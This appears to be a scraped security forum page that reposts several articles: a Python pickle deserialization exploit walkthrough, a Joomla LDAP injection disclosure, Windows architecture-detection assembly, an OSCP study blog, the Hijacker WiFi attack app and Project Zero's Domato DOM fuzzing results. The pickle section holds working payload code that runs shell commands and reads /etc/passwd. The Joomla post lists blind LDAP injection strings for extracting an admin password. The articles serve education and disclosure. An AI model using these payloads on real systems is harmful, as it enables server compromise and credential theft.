file.read() my_data = pickle.loads(pickle_data) A Powned will be displayed with the loads function, as echo Powned will be executed. It's easy then to imagine what we can do with such a powerful vulnerability. The exploit In the pickle-prick application, pickle is used in order to retrieve all adventures: async def do_import(request): session = await get_session(request) data = await request.post() try: pickle_prick = data['file'].file.read() except: session['errors'] = ["Couldn't read pickle prick file."] return web.HTTPFound('/') prick = base64.b64decode(pickle_prick.decode()) session['adventures'] = [i for i in pickle.loads(prick)] return web.HTTPFound('/') So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of a code execution, the __reducer__ callable, must return an object that meets with adventures signature (which is an array of dictionary having a date, universe, planet and a morty). In order to do that, we will use the vulnerability twice: a first time to upload a malicious python code, and a second time to execute it. 1. Generating a payload to generate a payload We want to upload a python file that contain a callable that meets adventures signature and will be executed on the server. Let's write an evil_rick_shell.py file with such a code: def do_evil(): with open("/etc/passwd") as f: data = f.readlines() return [{"date": line, "dimension": "//", "planet": "//","morty": "//"} for line in data] Now, let's create a pickle that will write this file on the server: import pickle import base64 import os class EvilRick1(object): def __reduce__(self): with open("evil_rick_shell.py") as f: data = f.readlines() shell = "\n".join(data) return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),) prick = pickle.dumps(EvilRick1()) if os.name == 'nt': # Windows trick prick = prick[0:3] + b"os" + prick[5:] pickle_prick = base64.b64encode(prick).decode() with open("evil_rick1.data", "w") as file: file.write(pickle_prick) This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not meet with adventure signature, uploading the evil_rick1.data should return a 500 error, but it will be too late for any security 2. Generating a payload to execute a payload Now let's create a pickle object that will call the evil_rick_shell.do_evil callable: import pickle import base64 import evil_rick_shell class EvilRick2(object): def __reduce__(self): return evil_rick_shell.do_evil, () prick = pickle.dumps(EvilRick2()) pickle_prick = base64.b64encode(prick).decode() with open("evil_rick2.data", "w") as file: file.write(pickle_prick) The evil_rick_shell.do_evil callable meeting with adventure signature, uploading the evil_rick2.data should be fine, and should add each line of the /etc/passwd file as an adventure. Build it all together Once both payloads are generated, simply upload the first one, then the second one, and you should be able to have this amazing screen: We can see that the do_evil() payload has been triggered, and we can see the content of /etc/passwd file. Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil to be executed on Rick's server. How to protect against it It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret forged object with malicious code within. I hope you enjoyed this article, and have fun with it Dan Lousqui IT Security Senior Consultant, developer, open source enthousiast, and so much more ! Sursa: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
-
- 1
-
-
Screenshots Description IMPORTANT: This app works with Windows 10 Pro and Home but not with Windows 10 S. We've updated WinDbg to have more modern visuals, faster windows, a full-fledged scripting experience, and Time Travel Debugging, all with the easily extensible debugger data model front and center. WinDbg Preview is using the same underlying engine as WinDbg today, so all the commands, extensions, and workflows you're used to will still work as they did before. See http://aka.ms/windbgblog and https://go.microsoft.com/fwlink/p/?linkid=854349 for more information! Sursa: https://www.microsoft.com/en-us/store/p/windbg-preview/9pgjgd53tn86
- 1 reply
-
- 2
-
-
-
September 24, 2017 Detecting Architecture in Windows Leave a comment After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware 1 2 3 xor eax,eax mov ax,cs shr eax,5 I had a look at the segment registers last night and I found out that we can use ES, GS and FS segment registers for detecting the architecture as well. Using ES 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax,eax mov ax,es ror ax, 0x3 and eax,0x1 test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 Using GS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, gs test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main Using TEB Apart from that, you can also use TEB + 0xc0 entry which is ‘WOW32Reserved’. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, [FS:0xc0] test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main I included all in one and coded a small C application. I’m sure there might be many other tricks to detect the architecture. This might come handy in shellcoding #include <Windows.h> #include <wchar.h> /* * Author: Osanda Malith Jayathissa - @OsandaMalith * Website: https://osandamalith.com * Description: Few tricks that you can use to detect the architecture in Windows * Link : http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/ */ BOOL detectArch_ES() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, es ror ax, 0x3 and eax, 0x1 } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, es;" "ror ax, 0x3;" "and eax, 0x1;" ); #endif } BOOL detectArch_GS() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, gs } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, gs;" ); #endif } BOOL detectArch_TEB() { #if defined(_MSC_VER) _asm { xor eax, eax mov eax, fs:[0xc0] } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov eax, fs:[0xc0];" ); #endif } int main(int argc, char* argv[]) { wprintf( !detectArch_ES() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_GS() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); return 1337; } view raw detectArch.c hosted with by GitHub Sursa: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
- 1 reply
-
- 4
-
-
-
OSCP Certification by ciaranmcnally Given I have been working in information security for the past few years, I became well aware of the different certifications available as a means of professional development. The certification that stood out as gaining the most respect from the security community seemed to be the “(OSCP) Offensive Security Certified Professional” certificate, I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24 hour practical exam vs a multiple choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification. To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal and aside from all of that, it’s also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get this as I’ve had clients in the past not follow up on using my services due to me not having any official security certificates (especially CREST craving UK based customers). Hopefully this opens up some doors to new customers. Before undertaking this course I already had a lot of experience performing vulnerability assessments and penetrations tests, I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement. I would describe the hacking with kali course materials and videos as very entry-level friendly which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment, this is an amazing experience and it’s hard not to get excited thinking about it. There were moments of frustration and teeth-grinding but it was a very enjoyable way to sharpen skills and try out new techniques or tools. I signed up for the course initially a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quick and didn’t concentrate on it at all. I did one or two of the “known to be hard” machines in the labs fairly easily which convinced me I was ready and sat the exam having compromised less than 10 of the lab hosts. This was of course silly and I only managed 2 roots and one local access shell which wasn’t near enough points to pass and very much dulled my arrogance at the time. I didn’t submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date. Fast forward over a year later to the start of this month (September) and I had 2 weeks free that I couldn’t get contract work for. So I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate. In the two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. This went well but I didn’t quite make it over the line. I rooted 3 machines and fell short of privilege escalating on a 4th windows host. I was so close and possibly could have passed if I did the lab report and exercises, however this time around I wasn’t upset by the failure and became more determined than ever to keep trying. I booked another 2 weeks in the labs, focused on machines with manual windows privilege escalation and booked my next exam sitting, successfully nailing it. As I had learned a lot of penetration testing skills doing bug bounties, I found that it was very easy to identify and gain remote access to the lab machines, I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I don’t elevate any further with a remote code execution issue on a live production environment. This activity is also greatly discouraged in bug bounties so I can very much see why I didn’t have much skill in this area. The OSCP lab environment taught me a large amount of techniques and different ways of accomplishing this. I feel I have massively skilled up with regard to privilege escalation on Linux or Windows hosts. I’m very happy to join the ranks of the (OSCP) Offensive Security Certified Professionals and would like to thank anyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge sharing mantra in mind, below is a categorized list of very useful resources I have used during my journey to achieving certification. I hope these help you to overcome many obstacles by trying harder! Mixed https://www.nop.cat/nmapscans/ https://github.com/1N3/PrivEsc https://github.com/xapax/oscp/blob/master/linux-template.md https://github.com/xapax/oscp/blob/master/windows-template.md https://github.com/slyth11907/Cheatsheets https://github.com/erik1o6/oscp/ https://backdoorshell.gitbooks.io/oscp-useful-links/content/ https://highon.coffee/blog/lord-of-the-root-walkthrough/ MsfVenom https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://netsec.ws/?p=331 Shell Escape Techniques https://netsec.ws/?p=337 https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells Pivoting http://www.fuzzysecurity.com/tutorials/13.html http://exploit.co.il/networking/ssh-tunneling/ https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117 https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ https://www.offensive-security.com/metasploit-unleashed/portfwd/ Linux Privilege Escalation https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\#gref https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/mzet-/linux-exploit-suggester https://github.com/SecWiki/linux-kernel-exploits https://highon.coffee/blog/linux-commands-cheat-sheet/ https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt https://github.com/lucyoa/kernel-exploits https://www.rebootuser.com/?p=1758 https://www.securitysift.com/download/linuxprivchecker.py https://www.youtube.com/watch?v=dk2wsyFiosg https://www.youtube.com/watch?v=2NMB-pfCHT8https://www.youtube.com/watch?v=1A7yJxh-fyc https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/ https://github.com/foxglovesec/RottenPotato https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py https://github.com/pentestmonkey/windows-privesc-check https://github.com/PowerShellMafia/PowerSploit https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md https://github.com/SecWiki/windows-kernel-exploits https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.gracefulsecurity.com/privesc-unquoted-service-path/ https://www.commonexploits.com/unquoted-service-paths/ https://www.exploit-db.com/dll-hijacking-vulnerable-applications/ https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be Sursa: https://securit.ie/blog/?p=70
- 1 reply
-
- 4
-
-
-
Nu stiu cine sunt, nu am auzit de ei, dar din moment ce e gratuit si ei nu au nimic de castigat (doar din donatii), mi se pare o idee OK.
-
Se mai intampla, nu e chiar asa grav, cred.
-
Ce hateri sunteti, oamenii incearca sa faca ceva util. Stati sa crape filelist sa vedeti ce o sa mai cautati asta...
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper has now support for Chrome x64 SSL Hook (last) version https://github.com/NytroRST/NetRipper/ -
Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection 20 Sep 2017 by Dr. Johannes Dahse, Robin Peraglie With over 84 million downloads, Joomla! is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites’ content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8. Requirements - Who is affected Installations with the following requirements are affected by this vulnerability: Joomla! version 1.5 <= 3.7.5 is installed Joomla! is configured to use LDAP for authentication This is not a configuration flaw and an attacker does not need any privileges to exploit this vulnerability. Impact - What can an attacker do By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla! installation. These include the username and password of the super user, the Joomla! administrator. An attacker can then use the hijacked information to login to the administrator control panel and to take over the Joomla! installation, as well as potentially the web server, by uploading custom Joomla! extensions for remote code execution. Vulnerability Analysis - CVE-2017-14596 Our code analysis solution RIPS automatically identified the vulnerability that spans over the following nested code lines. First, in the LoginController the Joomla! application receives the user-supplied credentials from the login form. /administrator/components/com_login/controller.php class LoginController extends JControllerLegacy { public function login() { ⋮ $app = JFactory::getApplication(); ⋮ $model = $this->getModel('login'); $credentials = $model->getState('credentials'); ⋮ $app->login($credentials, array('action' => 'core.login.admin')); } } The credentials are passed on to the login method which then invokes the authenticatemethod. /libraries/cms/application/cms.php class JApplicationCms extends JApplicationWeb { public function login($credentials, $options = array()) { ⋮ $authenticate = JAuthentication::getInstance(); $authenticate->authenticate($credentials, $options); } } /libraries/joomla/authentication/authentication.php class JAuthentication extends JObject { public function authenticate($credentials, $options = array()) { ⋮ $plugin->onUserAuthenticate($credentials, $options, $response); } } Based on the plugin that is used for authentication, the authenticate method passes the credentials to the onUserAuthenticate method. If Joomla! is configured to use LDAP for authentication, the LDAP plugin’s method is invoked. /plugins/authentication/ldap/ldap.php class PlgAuthenticationLdap extends JPlugin { public function onUserAuthenticate($credentials, $options, &$response) { ⋮ $userdetails = $ldap->simple_search( str_replace( '[search]', $credentials['username'], $this->params->get('search_string') ) ); } } In the LDAP plugin, the username credential is embedded into the LDAP query specified in the search_string option. According to the official Joomla! documentation, the search_stringconfiguration option is “a query string used to search for the user, where [search] is directly replaced by search text from the login field”, for example “uid=[search]“. The LDAP query is then passed to the simple_search method of the LdapClient which connects to the LDAP server and performs the ldap_search. /libraries/vendor/joomla/ldap/src/LdapClient.php class LdapClient { public function simple_search($search) { $results = explode(';', $search); foreach ($results as $key => $result) { $results[$key] = '(' . $result . ')'; } return $this->search($results); } public function search(array $filters, ...) { foreach ($filters as $search_filter) { $search_result = @ldap_search($res, $dn, $search_filter, $attr); ⋮ } } } Even if RIPS is unaware of the exact LDAP query that is loaded from an external configuration file, RIPS detects and reports successfully the root cause of this vulnerability: User input is mixed unsanitized with LDAP query markup that is passed to the sensitive ldap_searchfunction. The vulnerability was detected within 7 minutes in half a million lines of Joomla! code. The truncated analysis results are available in our RIPS demo application. Please note that we limited the results to the issues described in this post in order to ensure a fix is available. See RIPS report Proof Of Concept - Blind LDAP Injection The lack of input sanitization of the username credential used in the LDAP query allows an adversary to modify the result set of the LDAP search. By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively by sending a row of payloads that guess the credentials character by character. XXX;(&(uid=Admin)(userPassword=A*)) XXX;(&(uid=Admin)(userPassword=B*)) XXX;(&(uid=Admin)(userPassword=C*)) ... XXX;(&(uid=Admin)(userPassword=s*)) ... XXX;(&(uid=Admin)(userPassword=se*)) ... XXX;(&(uid=Admin)(userPassword=sec*)) ... XXX;(&(uid=Admin)(userPassword=secretPassword)) Each of these payloads yield exactly one out of two possible states which allow an adversary to abuse the server as an Oracle. A filter bypass is necessary for exploitation that is not covered in this blog post. With an optimized version of these payloads one bit per request can be extracted from the LDAP server which results in a highly efficient blind LDAP injection attack. Time Line Date What 2017/07/27 Provided vulnerability details and PoC to vendor 2017/07/29 Vendor confirmed security issue 2017/09/19 Vendor released fixed version Summary As one of the most popular open source CMS applications, Joomla! receives many code reviews from the security community. Yet alone one missed security vulnerability in the 500,000 lines of code can lead to a server compromise. With the help of static code analysis, RIPS detected a critical LDAP injection vulnerability (CVE-2017-14596) that remained undiscovered for over 8 years. The vulnerability allows an attacker to steal login credentials from Joomla! installations that use LDAP authentication. We would like to thank the Joomla! Security Strike Team for an excellent coordination and remediation of this issue and recommend to update to the latest Joomla! version 3.8 immediately. More about RIPS Author: Dr. Johannes Dahse CEO, Co-Founder Johannes exploits security vulnerabilities in PHP code for 10 years. He is an active speaker at academic and industry conferences and a recognized expert in this field. He achieved his Ph.D. in IT security / static code analysis at the Ruhr-University Bochum, Germany. Previously, he worked as a security consultant for leading companies worldwide. Sursa: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
-
USENIX Publicat pe 15 sept. 2017 Philipp Koppe, Benjamin Kollenda, Marc Fyrbiak, Christian Kison, Robert Gawlik, Christof Paar, and Thorsten Holz, Ruhr-University Bochum Microcode is an abstraction layer on top of the physical components of a CPU and present in most general-purpose CPUs today. In addition to facilitate complex and vast instruction sets, it also provides an update mechanism that allows CPUs to be patched in-place without requiring any special hardware. While it is well-known that CPUs are regularly updated with this mechanism, very little is known about its inner workings given that microcode and the update mechanism are proprietary and have not been throughly analyzed yet. In this paper, we reverse engineer the microcode semantics and inner workings of its update mechanism of conventional COTS CPUs on the example of AMD’s K8 and K10 microarchitectures. Furthermore, we demonstrate how to develop custom microcode updates. We describe the microcode semantics and additionally present a set of microprograms that demonstrate the possibilities offered by this technology. To this end, our microprograms range from CPU-assisted instrumentation to microcoded Trojans that can even be reached from within a web browser and enable remote code execution and cryptographic implementation attacks. View the full program: https://www.usenix.org/sec17/program
-
Hijacker Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work. Features Information Gathering View a list of access points and stations (clients) around you (even hidden ones) View the activity of a specific network (by measuring beacons and data packets) and its clients Statistics about access points and stations See the manufacturer of a device (AP or station) from the OUI database See the signal power of devices and filter the ones that are closer to you Save captured packets in .cap file Attacks Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target) Deauthenticate a specific client from the network it's connected MDK3 Beacon Flooding with custom options and SSID list MDK3 Authentication DoS for a specific network or to everyone Capture a WPA handshake or gather IVs to crack a WEP network Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter) Other Leave the app running in the background, optionally with a notification Copy commands or MAC addresses to clipboard Includes the required tools, no need for manual installation Includes the nexmon driver and management utility for BCM4339 devices Set commands to enable and disable monitor mode automatically Crack .cap files with a custom wordlist Create custom actions and run them on an access point or a client easily Sort and filter Access Points with many parameters Export all the gathered information to a file Add an alias to a device (by MAC) for easier identification More Screenshots Installation Make sure: you are on Android 5+ you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU) have a firmware to support Monitor Mode on your wireless interface Download the latest version here. When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode. Troubleshooting This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need. In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings. If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version. Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected. Warning Legal It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause. Device The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned. Donate If you like my work, you can buy me a beer. Sursa: https://github.com/chrisk44/Hijacker
-
- 2
-
-
-
Thursday, September 21, 2017 The Great DOM Fuzz-off of 2017 Posted by Ivan Fratric, Project Zero Introduction Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs. An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing. The fuzzer For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing. We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions. The fuzzer consists of several parts: The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing. The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part. A set of grammars for generating HTML, CSS and JavaScript code. One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach: I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property. Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as: Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs. Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation. Setup We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run. Here are additional details of the fuzzing setup for each browser: Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds. Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build. Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues. Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing. Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac. Results Without further ado, the number of security bugs found in each browsers are captured in the table below. Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release). Vendor Browser Engine Number of Bugs Project Zero Bug IDs Google Chrome Blink 2 994, 1024 Mozilla Firefox Gecko 4* 1130, 1155, 1160, 1185 Microsoft Internet Explorer Trident 4 1011, 1076, 1118, 1233 Microsoft Edge EdgeHtml 6 1011, 1254, 1255, 1264, 1301, 1309 Apple Safari WebKit 17 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250 Total 31** *While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers **The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another. However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit. It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of an useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it! When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats. Experimenting with coverage-guided DOM fuzzing Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows: The fuzzer generates 